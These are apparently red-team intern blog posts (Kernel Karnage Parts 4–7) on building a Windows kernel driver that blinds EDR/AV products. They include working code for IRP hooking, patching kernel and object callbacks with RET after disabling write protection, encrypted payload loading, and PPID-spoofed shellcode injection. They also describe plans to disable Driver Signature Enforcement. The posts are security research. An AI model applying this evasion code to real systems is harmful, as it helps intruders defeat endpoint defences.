Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 4 (Inter(ceptor)mezzo)

19 November 2021 at 15:18

To make up for the long wait between parts 2 and 3, we’re releasing another blog post this week. Part 4 is a bit smaller than the others, an intermezzo between parts 3 and 5 if you will, discussing interceptor.

1. RTFM & W(rite)TFM!

The past few weeks I spent a lot of time getting acquainted with the windows kernel and the inner workings of certain EDR/AV products. I also covered the two main methods of attacking the EDR/AV drivers, namely kernel callback patching and IRP MajorFunction hooking. I’ve been working on my own driver called Interceptor, which will implement both these techniques as well as a method to load itself into kernel memory, bypassing Driver Signing Enforcement (DSE).

I’m of the opinion that when writing tools or exploits, the author should know exactly what each part of his/her/their code is responsible for, how it works and avoid copy pasting code from similar projects without fully understanding it. With that said, I’m writing Interceptor based on numerous other projects, so I’m taking my time to go through their associated blogposts and understand their working and purpose.

Interceptor currently supports IRP hooking/unhooking drivers by name or by index based on loaded modules.

Using the -l option, Interceptor will list all the currently loaded modules on the system and assign them an index. This index can be used to hook the module with the -h option.

Using the -lh option, Interceptor will list all the currently hooked modules with their corresponding index in the global hooked drivers array. Interceptor currently supports hooking up to 64 drivers. The index can be used with the -u option to unhook the module.

Interceptor list hooked drivers

Once a module is hooked, Interceptor’s InterceptGenericDispatch() function will be called whenever an IRP is received. The current function notifies a call was intercepted via a debug message and then call the original completion routine. I’m currently working on a method to inspect and modify the IRPs before passing them to their completion routine.

NTSTATUS InterceptGenericDispatch(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
	UNREFERENCED_PARAMETER(DeviceObject);
    auto stack = IoGetCurrentIrpStackLocation(Irp);
	auto status = STATUS_UNSUCCESSFUL;
	KdPrint((DRIVER_PREFIX "GenericDispatch: call intercepted\n"));

    //inspect IRP
    if(isTargetIrp(Irp)) {
        //modify IRP
        status = ModifyIrp(Irp);
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    else if (isDiscardIrp(Irp)) {
        //call own completion routine
        status = STATUS_INVALID_DEVICE_REQUEST;
	    return CompleteRequest(Irp, status, 0);
    }
    else {
        //call original
        for (int i = 0; i < MaxIntercept; i++) {
            if (globals.Drivers[i].DriverObject == DeviceObject->DriverObject) {
                auto CompletionRoutine = globals.Drivers[i].MajorFunction[stack->MajorFunction];
                return CompletionRoutine(DeviceObject, Irp);
            }
        }
    }
    return CompleteRequest(Irp, status, 0);
}

I’m also working on a module that supports patching kernel callbacks. The difficulty here is locating the different callback arrays by enumerating their calling functions and looking for certain opcode patterns, which change between different versions of Windows.

As mentioned in one of my previous blogposts, locating the callback arrays for PsSetCreateprocessNotifyRoutine() and PsSetCreateThreadNotifyRoutine() is done by looking for a CALL instruction to PspSetCreateProcessNotifyRoutine() and PspSetCreateThreadNotifyRoutine() respectively, followed by looking for a LEA instruction.

Finding the callback array for PsSetLoadImageNotifyRoutine() is slightly different as the function first jumps to PsSetLoadImageNotifyRoutineEx(). Next, we skip looking for the CALL instruction and go straight for the LEA instruction instead, which puts the callback array address into RCX.

LoadImage callback array

Interceptor’s callback module currently implements patching functionality for Process and Thread callbacks.

The registered callbacks on the system and their patch status can be listed using the -lc command.

2. Conclusion

In the previous blogpost of this series, we combined the functionality of two drivers, Evilcli and Interceptor, to partially bypass $vendor2. In this post we took a closer look at Interceptor’s capabilities and future features that are in development. In the upcoming blogposts, we’ll see how Interceptor as a fully standalone driver is able to conquer not just $vendor2, but other EDR products as well.

References

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 5 (I/O & Callbacks)

30 November 2021 at 10:02

After showing interceptor’s options, it’s time to continue coding! On the menu are registry callbacks, doubly linked lists and a struggle with I/O in native C.

1. Interceptor 2.0

Until now, I relied on the Evil driver to patch kernel callbacks while I attempted to tackle $vendor2, however the Evil driver only implements patching for process and thread callbacks. This week I spent a good amount of time porting over the functionality from Evil driver to Interceptor and added support for patching image load callbacks as well as a first effort at enumerating registry callbacks.

While I was working, I stumbled upon Mimidrv In Depth: Exploring Mimikatz’s Kernel Driver by Matt Hand, an excellent blogpost which aims to clarify the inner workings of Mimikatz’ kernel driver. Looking at the Mimikatz kernel driver code made me realize I’m a terrible C/C++ developer and I wish drivers were written in C# instead, but it also gave me an insight into handling different aspects of the interaction process between the kernel driver and the user mode application.

To make up for my sins, I refactored a lot of my code to use a more modular approach and keep the actual driver code clean and limited to driver-specific functionality. For those interested, the architecture of Interceptor looks somewhat like this:

.
+-- Driver
|   +-- Header Files
    |   +-- Common.h                | contains structs and IOCTLs shared between the driver and CLI
    |   +-- Globals.h               | contains global variables used in all modules
    |   +-- pch.h                   | precompiled header
    |   +-- Interceptor.h           | function prototypes
    |   +-- Intercept.h             | function prototypes
    |   +-- Callbacks.h             | function prototypes
    +-- Source Files
    |   +-- pch.cpp
    |   +-- Interceptor.cpp         | driver code
    |   +-- Intercept.cpp           | IRP hooking module
    |   +-- Callbacks.cpp           | Callback patching module
+-- CLI
|   +-- Source Files
    |   +-- InterceptorCLI.cpp

2. Driver I/O and why it’s a mess

Something else that needs overhauling is the way the driver handles I/O from the user mode application. When the user mode application requests a listing of all the present drivers on the system, or the registered callbacks, a lot of data needs to be collected and sent back in an efficient and structured manner. I’m not particularly fussy about speed or memory usage, but I would like to keep the code tidy, easy to read and understand, and keep the risk of dangling pointers and memory leaks at a minimum.

Drivers typically handle I/O via 3 different ways:

  1. Using the IRP_MJ_READ dispatch routine with ReadFile()
  2. Using the IRP_MJ_WRITE dispatch routine with WriteFile()
  3. Using the IRP_MJ_DEVICE_CONTROL dispatch routine with DeviceIoControl()

Using 3 different methods:

  1. Buffered I/O
  2. Direct I/O
  3. On a IOCTL basis
    1. METHOD_NEITHER
    2. METHOD_BUFFERED
    3. METHOD_IN_DIRECT
    4. METHOD_OUT_DIRECT

Since Interceptor returns different data depending on the request (IRP) it received, the I/O is handled in the IRP_MJ_DEVICE_CONTROL dispatch routine on a IOCTL basis using METHOD_BUFFERED. As discussed in Part 2, an IRP is accompanied by one or more IO_STACK_LOCATION structures which we can retrieve using IoGetCurrentIrpStackLocation(). The current stack location is important, because it contains several fields with information regarding user buffers.

When using METHOD_BUFFERED, the I/O Manager will assist us with managing resources. When the request comes in, the I/O manager will allocate the system buffer from non-paged pool memory (non-paged pool memory is always present in RAM) with a size that is the maximum of the lengths of the input and output buffers and then copy the user input buffer to the system buffer. When the request is complete, the I/O manager copies the specified number of bytes from the system buffer to the user output buffer.

PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
//size of user input buffer
size_t szBufferIn = stack->Parameters.DeviceIoControl.InputBufferLength;
//size of user output buffer
size_t szBufferOut = stack->Parameters.DeviceIoControl.OutputBufferLength;
//system buffer used for both reading and writing
PVOID bufferInOut = Irp->AssociatedIrp.SystemBuffer;

Using buffered I/O has a drawback, namely we need to define common I/O structures for use in both driver and user mode application, so we know what input, output and size to expect. As an example, we will pass an index and driver name from our user mode application to our driver:

//Common.h
struct USER_DRIVER_DATA {
    char driverName[256];
    int index;
}

//ApplicationCLI.cpp
DWORD lpBytesReturned;
USER_DRIVER_DATA inputBuffer;
data.index = 1;
data.driverName = "\\Driver\\MyDriver";
DeviceIoControl(hDevice, IOCTL_MYDRIVER_GET_DRIVER_INFO, &inputBuffer, sizeof(inputBuffer), nullptr, 0, &lpBytesReturned, nullptr);

//MyDriver.cpp
auto data = (USER_DRIVER_DATA*)Irp->AssociatedIrp.SystemBuffer;
int index = data->index;
char driverName[256];
strcpy_s(driverName, data->driverName);

Using this approach, we quickly end up with a lot of different structures in Common.h for each of the different I/O requests, so I went looking for a “better”, more generic way of handling I/O. I decided to look at the Mimikatz kernel driver code again for inspiration. The Mimikatz driver uses METHOD_NEITHER, combined with a custom buffer and a wrapper around the RtlStringCbPrintfExW() function.

When using METHOD_NEITHER, the I/O Manager is not involved and it is up to the driver itself to manage the user buffers. The input and output buffer are no longer copied to and from the system buffer.

PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
//using input buffer
PVOID bufferIn = stack->Parameters.DeviceIoControl.Type3InputBuffer;
//user output buffer
PVOID bufferOut = Irp->UserBuffer;

The idea behind the Mimikatz approach is to declare a single buffer structure and a wrapper kprintf() around RtlStringCbPrintfExW():

typedef struct _MY_BUFFER {
    size_t* szBuffer;
    PWSTR* Buffer;
} MY_BUFFER, * PMY_BUFFER;

#define kprintf(MyBuffer, Format, ...) (RtlStringCbPrintfExW(*(MyBuffer)->Buffer, *(MyBuffer)->szBuffer, (MyBuffer)->Buffer, (MyBuffer)->szBuffer, STRSAFE_NO_TRUNCATION, Format, __VA_ARGS__))

The kprintf() wrapper accepts a pointer to our buffer structure MY_BUFFER, a format string and multiple arguments to be used with the format string. Using the provided format string, it will write a byte-counted, null-terminated text string to the supplied buffer *(MyBuffer)->Buffer.

Using this approach, we can dynamically allocate our user output buffer using bufferOut = LocalAlloc(LPTR, szBufferOut), this will allocate the specified number of bytes (szBufferOut) as fixed memory memory on the heap and initialize it to zero (LPTR (0x0040) flag = LMEM_FIXED (0x0000) + LMEM_ZEROINIT (0x0040) flags).

We can then write to this output buffer in our driver using the kprintf() wrapper:

MY_BUFFER kOutputBuffer = { &szBufferOut, (PWSTR*)&bufferOut };
szBufferOut = stack->Parameters.DeviceIoControl.OutputBufferLength;
bufferOut = Irp->UserBuffer;
szBufferIn = stack->Parameters.DeviceIoControl.InputBufferLength;
bufferIn = stack->Parameters.DeviceIoControl.Type3InputBuffer;

kprintf(&kOutputBuffer, L"Input: %s\nOutput: %s\n", bufferIn, L"our output");
ULONG_PTR information = stack->Parameters.DeviceIoControl.OutputBufferLength - szBufferOut;

return CompleteIrp(Irp, status, information);

If the output buffer appears too small for all the data we wish to write, kprintf() will return STATUS_BUFFER_OVERFLOW. Because the STRSAFE_NO_TRUNCATION flag is set in RtlStringCbPrintfExW(), the contents of the output buffer will not be modified, so we can increase the size, reallocate the output buffer on the heap and try again.

3. Recalling the callbacks

As mentioned in previous blogposts, locating the different callback arrays and implementing a function to patch them was fairly straightforward. Apart from process and thread callbacks, I also added in the PsLoadImageNotifyRoutineEx() callback, which alerts a driver whenever a new image is loaded or mapped into memory.

Registry and Object creation/duplication callbacks work slightly different when it comes to how the callback function addresses are stored. Instead of a callback array containing function pointers, the function pointers for registry and object callbacks are stored in a doubly linked list. This means that instead of looking for a callback array address, we’ll be looking for the address of the CallbackListHead.

CallbackListHead

Instead of going the same route as with obtaining the address for the callback arrays by enumerating the instructions in the NotifyRoutine() functions looking for a series of opcodes, I decided to instead enumerate the CmUnRegisterCallback() function, which is used to remove a registry callback. The reason behind this approach is that in order to obtain the CallbackListHead address via CmRegisterCallback(), we need to follow 2 jumps (0xE8) to CmpRegisterCallbackInternal() and CmpInsertCallbackInListByAltitude(). Instead, by using CmUnRegisterCallback(), we only need to look for a LEA, RCX (0x48 0x8d 0x0d) instruction which puts the address of the CallbackListHead into RCX.

ULONG64 FindCmUnregisterCallbackCallbackListHead() {
	UNICODE_STRING func;
	RtlInitUnicodeString(&func, L"CmUnRegisterCallback");

	ULONG64 funcAddr = (ULONG64)MmGetSystemRoutineAddress(&func);

	ULONG64 OffsetAddr = 0;
	for (ULONG64 instructionAddr = funcAddr; instructionAddr < funcAddr + 0xff; instructionAddr++) {
		if (*(PUCHAR)instructionAddr == OPCODE_LEA_RCX_7[g_WindowsIndex] &&
			*(PUCHAR)(instructionAddr + 1) == OPCODE_LEA_RCX_8[g_WindowsIndex] &&
			*(PUCHAR)(instructionAddr + 2) == OPCODE_LEA_RCX_9[g_WindowsIndex]) {

			OffsetAddr = 0;
			memcpy(&OffsetAddr, (PUCHAR)(instructionAddr + 3), 4);
			return OffsetAddr + 7 + instructionAddr;
		}
	}
	return 0;
}

Once we have the CallbackListHead address, we can use it to enumerate the doubly linked list and retrieve the callback function pointers. The structure we’re working with can be defined as:

typedef struct _CMREG_CALLBACK {
    LIST_ENTRY List;
    ULONG Unknown1;
    ULONG Unknown2;
    LARGE_INTEGER Cookie;
    PVOID Unknown3;
    PEX_CALLBACK_FUNCTION Function;
} CMREG_CALLBACK, *PCMREG_CALLBACK;

The registered callback function pointer is located at offset 0x28.

PVOID* CallbackListHead = (PVOID*)FindCmUnregisterCallbackCallbackListHead();
PLIST_ENTRY pEntry;
ULONG64 i;

if (CallbackListHead) {
    for (pEntry = (PLIST_ENTRY)*CallbackListHead, i = 0; NT_SUCCESS(status) && (pEntry != (PLIST_ENTRY)CallbackListHead); pEntry = (PLIST_ENTRY)(pEntry->Flink), i++) {
        ULONG64 callbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x028);
        KdPrint((DRIVER_PREFIX "[%02llu] 0x%llx\n", i, callbackFuncAddr));
        //<truncated>   
    }
}

4. Conclusion

In this blogpost we took a brief look at the structure of the Interceptor kernel driver and how we can handle I/O between the kernel driver and user mode application without the need to create a crazy amount of structures. We then ventured back into callback land and took a peek at obtaining the CallbackListHead address of the doubly linked list containing registered registry callback function pointers (try saying that quickly 5 times in a row 😉 ).

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 6 (Last Call)

9 December 2021 at 13:04

With the release of this blogpost, we’re past the halfway point of my internship; time flies when you’re having fun.

1. Introduction – Status Report

In the course of these 6 weeks, I’ve covered several aspects of kernel drivers and EDR/AVs kernel mechanisms. I started off strong by examining kernel callbacks and why EDR/AV products use them extensively to gain vision into what’s happening on the system. I confirmed these concepts by leveraging existing work against $vendor1 and successfully executing Mimikatz on the compromised system.

Then I took a step back and did a deepdive in the inner structure and workings of a kernel driver, how it communicates with other drivers and applications and how I can intercept these communications using IRP MajorFunction hooks.

Once I had the basics sorted and got comfortable working with the kernel and a kernel debugger, I started developing my own driver called Interceptor, which has kernel callback patching and IRP MajorFunction hooking capabilities. I took the driver for a test drive against $vendor2 and concluded that attacking an EDR/AV product from kernel land alone is not sufficient and user land detection techniques should be taken into consideration as well.

To solve this problem, I then developed a custom shellcode injector using the EarlyBird technique, which combined with the Interceptor driver was able to partially bypass $vendor2 and launch a meterpreter session on the compromised system.

After this small success, I spent a good amount of time on code maintenance, refactoring, bug fixing and research, which has brought me to today’s blogpost. In this blogpost I would like to conclude the kernel callbacks, having solved my issues with registry and object callbacks, revisit the shellcode injector in a bit more detail and once more bring the fight to $vendor2. Let’s get to it, shall we?

2. Last call

Having covered process, thread and image callbacks in the previous blogposts, I think it’s only fair if we conclude this topic with registry and object callbacks. In the previous blogpost, I demonstrated how we can retrieve and enumerate the registry callback doubly linked list. The code to patch and subsequently restore these callbacks is almost identical, using the same iteration method. For the sake of simplicity, I decided to store the patched callbacks internally in an array of size 64, instead of another linked list.

for (pEntry = (PLIST_ENTRY)*callbackListHead, i = 0; pEntry != (PLIST_ENTRY)callbackListHead; pEntry = (PLIST_ENTRY)(pEntry->Flink), i++) {
  if (i == index) {
    auto callbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x028);
    CR0_WP_OFF_x64();
    PULONG64 pPointer = (PULONG64)callbackFuncAddr;

    switch (callback) {
      case registry:
        g_CallbackGlobals.RegistryCallbacks[index].patched = true;
        memcpy(g_CallbackGlobals.RegistryCallbacks[index].instruction, pPointer, 8);
        break;
      default:
        return STATUS_NOT_SUPPORTED;
        break;
    }

    *pPointer = (ULONG64)0xC3;
    CR0_WP_ON_x64();
    return STATUS_SUCCESS;
  }
}

With the registry callbacks patched and taken care of, it’s time to jump the last hurdle, and it’s a big one: object callbacks. Out of all the kernel callbacks, object callbacks definitely gave me the most grief and I still don’t understand them 100%. There is only limited documentation out there and most of it covers object callbacks itself and how to use them, not how to bypass or disable them. Nonetheless, I found a couple good resources which I think are worth sharing:

2.1 What is this Object Callbacks black magic?

Object callbacks are called as a result of process / thread / desktop HANDLE operations. They can either be called before the operation takes place (POB_PRE_OPERATION_CALLBACK) or after the operation completes (POB_POST_OPERATION_CALLBACK). A good example is the OpenProcess() API call, which returns an open HANDLE to the target local process object if it succeeds. When OpenProcess() is called, a pre-operation callback can be triggered, and when OpenProcess() returns, a post-operation callback can be triggered.

Object callbacks only work on process objects, thread objects and desktop objects. The most common usecase for these object callbacks is to modify the requested access rights to said object. If I were to attach a debugger to an EDR/AV process by using OpenProcess() with the PROCESS_ALL_ACCESS flag, the EDR/AV would most likely use an object callback to change the granted access rights to something like PROCESS_QUERY_LIMITED_INFORMATION to protect itself.

2.2 Where can I find one for myself?

I’m glad you asked! Turns out they’re a little bit harder to locate. Windows contains a very important structure called OBJECT_TYPE which is defined as:

typedef struct _OBJECT_TYPE {
  LIST_ENTRY TypeList;
  UNICODE_STRING Name;
  PVOID DefaultObject; 
  UCHAR Index;
  ULONG TotalNumberOfObjects;
  ULONG TotalNumberOfHandles;
  ULONG HighWaterNumberOfObjects;
  ULONG HighWaterNumberOfHandles;
  OBJECT_TYPE_INITIALIZER TypeInfo; //unsigned char TypeInfo[0x78];
  EX_PUSH_LOCK TypeLock;
  ULONG Key;
  LIST_ENTRY CallbackList; //offset 0xC8
} OBJECT_TYPE, *POBJECT_TYPE;
OBJECT_TYPE STRUCT

This structure is used to define the process and thread objects, which are the only two object types that allow callbacks on their creation and copying, and is stored in the global variables: **PsProcessType and **PsThreadType. It also contains a linked list entry LIST_ENTRY CallbackList, which points to a CALLBACK_ENTRY_ITEM structure defined as:

typedef struct _CALLBACK_ENTRY_ITEM {
	LIST_ENTRY EntryItemList;
	OB_OPERATION Operations;
	DWORD Active;
	PCALLBACK_ENTRY CallbackEntry;
	POBJECT_TYPE ObjectType;
	POB_PRE_OPERATION_CALLBACK PreOperation; //offset 0x28
	POB_POST_OPERATION_CALLBACK PostOperation; //offset 0x30
	__int64 unk;
} CALLBACK_ENTRY_ITEM, * PCALLBACK_ENTRY_ITEM;

The POB_PRE_OPERATION_CALLBACK PreOperation and POB_POST_OPERATION_CALLBACK PostOperation members contain the function pointers to the registered callback routines.

2.3 Show me the code!

The above mentioned global variables **PsProcessType and **PsThreatType can be used to grab a POBJECT_TYPE struct, which contains the LIST_ENTRY CallbackList address at offset 0xC8.

PVOID* FindObRegisterCallbacksListHead(POBJECT_TYPE pObType) {
  //POBJECT_TYPE pObType = *PsProcessType;
	return (PVOID*)((__int64)pObType + 0xc8);
}

The CallbackList address can then be used to enumerate the linked list in a similar manner as the registry callback list and patch the pre- and post-operation callback function pointers. The pre- and post-operation callbacks are located at offsets 0x28 and 0x30 in the CALLBACK_ENTRY_ITEM structure.

for (pEntry = (PLIST_ENTRY)*callbackListHead, i = 0; NT_SUCCESS(status) && (pEntry != (PLIST_ENTRY)callbackListHead); pEntry = (PLIST_ENTRY)(pEntry->Flink), i++) {
  if (i == index) {
    //grab pre-operation callback function address at offset 0x28
    auto preOpCallbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x28);
    if (MmIsAddressValid((PVOID*)preOpCallbackFuncAddr)) {
      CR0_WP_OFF_x64();

      //get a pointer to the registered callback function
      PULONG64 pPointer = (PULONG64)preOpCallbackFuncAddr;

      //save the original instruction, used to restore the callback
      switch (callback) {
        case object_process:
          g_CallbackGlobals.ObjectProcessCallbacks[index][0].patched = true;
          memcpy(g_CallbackGlobals.ObjectProcessCallbacks[index][0].instruction, pPointer, 8);
          break;
        case object_thread:
          g_CallbackGlobals.ObjectThreadCallbacks[index][0].patched = true;
          memcpy(g_CallbackGlobals.ObjectThreadCallbacks[index][0].instruction, pPointer, 8);
          break;
        default:
          return STATUS_NOT_SUPPORTED;
          break;
      }

      //patch the callback function with a RET (0xC3)
      *pPointer = (ULONG64)0xC3;

      CR0_WP_ON_x64();

      return STATUS_SUCCESS;
    }

    //grab post-operation callback function address at offset 0x30
    auto postOpCallbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x30);
    if (MmIsAddressValid((PVOID*)postOpCallbackFuncAddr)) {
      CR0_WP_OFF_x64();

      //get a pointer to the registered callback function
      PULONG64 pPointer = (PULONG64)postOpCallbackFuncAddr;

      //save the original instruction, used to restore the callback
      switch (callback) {
        case object_process:
          g_CallbackGlobals.ObjectProcessCallbacks[index][1].patched = true;
          memcpy(g_CallbackGlobals.ObjectProcessCallbacks[index][1].instruction, pPointer, 8);
          break;
        case object_thread:
          g_CallbackGlobals.ObjectThreadCallbacks[index][1].patched = true;
          memcpy(g_CallbackGlobals.ObjectThreadCallbacks[index][1].instruction, pPointer, 8);
          break;
        default:
          return STATUS_NOT_SUPPORTED;
          break;
      }

      //patch the callback function with a RET (0xC3)
      *pPointer = (ULONG64)0xC3;

      CR0_WP_ON_x64();

      return STATUS_SUCCESS;
    }
  }
}
Interceptor patch object callback
patched process object callback

3. Interceptor vs $vendor2: Round 2

In my previous attempt to bypass $vendor2 and run a meterpreter reverse TCP shell on the compromised system, the attack was detected, but not blocked. My EarlyBird shellcode injector used a staged payload to connect back to the metasploit framework and fetch the meterpreter payload, which then got flagged by $vendor2.

To try and solve this issue, I decided not to use a staged payload, but instead embed the whole meterpreter payload in the binary itself. Since the payload size is around 200.000 bytes, it is impractical at best to embed it as a hexadecimal string and it would get immediately flagged when any static analysis is performed. Instead, one of my colleagues, Firat Acar, suggested I could embed the payload as an encrypted resource and load and decrypt it at runtime in memory.

The code for this is surprisingly simple:

HRSRC scResource = FindResource(NULL, MAKEINTRESOURCE(IDR_PAYLOAD1), L"payload");
DWORD scSize = SizeofResource(NULL, scResource);
HGLOBAL scResourceData = LoadResource(NULL, scResource);

Once the resource is loaded, a function like memcpy() or NtWriteVirtualMemory() can be used to write it to memory. Once that’s done, it can be decrypted in memory using a simple XOR:

void XORDecryptInMemory(const char* key, int keyLen, int dataLen, LPVOID startAddr) {
	BYTE* t = (BYTE*)startAddr;

	for (DWORD i = 0; i < dataLen; i++) {
		t[i] ^= key[i % keyLen];
	}
}

Since my shellcode injector attempts to inject into a remote process, using this decrypt routine will cause a STATUS_ACCESS_VIOLATION exception, since directly accessing memory of a different process is not allowed. Instead functions like NtReadVirtualMemory() and NtWriteVirtualMemory() should be used.

However, after testing this approach against $vendor2, the embedded resource got flagged almost immediately. Maybe a better encryption algorithm like RC4 or AES could work, but that also comes with a lot of overhead to implement.

A different solution to this problem might be to fetch the payload remotely using sockets, in an attempt to avoid using higher level APIs like WinINet. For now I reverted back to a staged payload embedded as a hexadecimal string.

With the ability to now patch all the kernel callbacks, I decided to try and bypass $vendor2 once more. I disabled its botnet protection module, which inspects network traffic for potential malicious activity, since this is what flagged the meterpreter traffic in the first place. I wanted to see if apart from network packet inspection, $vendor2 would detect the meterpreter payload. However, after testing with an HTTPS implant, the botnet protection did not detect and block the payload.

4. Conclusion

This blogpost concludes patching the kernel callbacks. While there is more functionality to add and more problems to address from kernel space, such as ETW or minifilters, the main goal of sufficiently crippling an EDR/AV product using a kernel driver has been met. Using Interceptor, we can deploy a meterpreter shell or Cobalt Strike Beacon and even run Mimikatz undetected. The next challenge will be to deploy the driver on a target and bypass protections such as Driver Signature Enforcement.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 7 (Out of the Lab and Back to Reality)

20 December 2021 at 13:49

This week I emerge from the lab and put on a different hat.

1. Switching hats

With Interceptor being successful in blinding $vendor2 sufficiently to run a meterpreter reverse shell, it is time to put on the red team hat and get out of the perfect lab environment. To do just that, I had to revert some settings I turned off at the beginning of this series.

First, I enabled Secure Boot and disabled test signing mode on the target VM. Secure Boot will enable Microsoft’s Driver Signature Enforcement (DSE) policy, which blocks non-WHQL-signed drivers from being loaded, which includes my Interceptor driver. It’s important to note I left HyperGuard (HVCI) turned off, because I currently have no way of defeating Virtualization-based protection.

With the target configured, I then set up a Cobalt Strike Teamserver using a Gmail Malleable C2 profile and configured my EarlyBird shellcode injector to deliver an HTTPS Beacon. My idea was to simulate a scenario where an attacker (me) had managed to gain a foothold on the target and obtained an implant with elevated privileges. The attacker would then use the implant to disable DSE on the compromised system and load the Interceptor driver, all directly in memory to keep a low footprint. Once Interceptor has been loaded on the target system, it would cripple the EDR/AV product and allow the attacker to run Mimikatz undetected.

Naturally, nothing ever goes as planned.

2. Outspoofing myself

The first issue I ran into was executing my shellcode injector with elevated privileges. No matter what I tried, I couldn’t seem to get a Beacon callback with elevated privileges, so I took my issue to infosec Twitter and unmasked the culprit with the help of @trickster012.

The code that is responsible for spawning a new spoofed process which is then used to inject the Beacon payload into looks like this:

PROCESS_INFORMATION Spawn(LPSTR procPath, HANDLE parentHandle)
{
    //do dynamic imports
    hK32 = GetModuleHandleA("kernel32");
    FARPROC fpInitializeProcThreadAttributeList = GetProcAddress(hK32, "InitializeProcThreadAttributeList");
    _InitializeProcThreadAttributeList InitializeProcThreadAttributeList = (_InitializeProcThreadAttributeList)fpInitializeProcThreadAttributeList;
    FARPROC fpUpdateProcThreadAttribute = GetProcAddress(hK32, "UpdateProcThreadAttribute");
    _UpdateProcThreadAttribute UpdateProcThreadAttribute = (_UpdateProcThreadAttribute)fpUpdateProcThreadAttribute;
    FARPROC fpDeleteProcThreadAttributeList = GetProcAddress(hK32, "DeleteProcThreadAttributeList");
    _DeleteProcThreadAttributeList DeleteProcThreadAttributeList = (_DeleteProcThreadAttributeList)fpDeleteProcThreadAttributeList;

    STARTUPINFOEXA si;
    PROCESS_INFORMATION pi;
    SIZE_T attributeSize;

    memset(&si, 0, sizeof(si));
    memset(&pi, 0, sizeof(pi));

    InitializeProcThreadAttributeList(NULL, 2, 0, &attributeSize);
    si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize);
    InitializeProcThreadAttributeList(si.lpAttributeList, 2, 0, &attributeSize);

    DWORD64 policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
    //enable CIG
    UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &policy, sizeof(DWORD64), NULL, NULL);
    //PPID spoof: set parentHandle as parent process
    UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentHandle, sizeof(HANDLE), NULL, NULL);

    si.StartupInfo.cb = sizeof(si);
    si.StartupInfo.dwFlags = EXTENDED_STARTUPINFO_PRESENT;

    if (!CreateProcessA(NULL, procPath, NULL, NULL, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi))
    {
        throw "";
    }

    std::cout << "Process created!" << " PID: " << pi.dwProcessId << "\n";

    DeleteProcThreadAttributeList(si.lpAttributeList);
    NtClose(parentHandle);

    return pi;
}

The Spawn() function takes a parameter HANDLE parentHandle, which is used to set the parent process of the newly created process. The handle would in this case point to explorer.exe as this is the process I was spoofing. @CaptMeelo recently posted a great blogpost titled Picky PPID Spoofing which covers the topic of PPID spoofing quite well.

To make a long story short, as stated in the Microsoft documentation, the to-be-created process inherits certain attributes from its parent process (the one we’re spoofing), this also happens to include the process token. One of the many things contained in a token are the privileges held by the user or the user’s group that are associated with the process.

Parent process attributes

If we take a look at explorer.exe in Process Hacker we can see the associated user and token. We can also see that the process is not running in elevated context. Taking into consideration the attribute inheritance, it makes sense that I couldn’t manage to spawn an elevated process with explorer.exe set as parent.

Explorer.exe process hacker

With this issue identified and remediated, I ran head first into the next one: concealing Beacon from EDR/AV. My shellcode injector is still configured to use embedded shellcode, instead of pulling a payload from somewhere else. So far this has worked quite well, using stageless payloads. I replaced the meterpreter payload with one of Cobalt Strike’s stagers, which would then pull a full HTTPS Beacon payload. I have not (yet) modified Beacon, so once the stager pulls the payload, EDR/AV detects a Cobalt Strike artifact in memory and takes action. Uh oh, not good. As of writing this blogpost, I have not yet figured out the answer to this problem, if there are any reader suggestions, you’re more than welcome to share them with me on Twitter.

3. Disabling Driver Signature Enforcement (DSE)

Instead, I decided to move on to the task at hand: disabling driver signature enforcement (DSE) on the target and loading Interceptor. Over the course of my research I stumbled across Kernel Driver Utility (KDU), a tool developed by @hfiref0x. One of the many wonderous things this tool can do is disable Driver Signature Enforcement (DSE). It does this by loading a WHQL-signed driver with an arbitrary kernel memory read/write vulnerability to change the state of ntoskrnl.exe g_CiEnabled or CI.dll g_CiOptions, depending on the build version of Windows.

I tested KDU and it worked well, except it didn’t tick all the boxes required for the scenario:

  1. It got flagged by EDR/AV
  2. It cannot be executed in memory from a Beacon

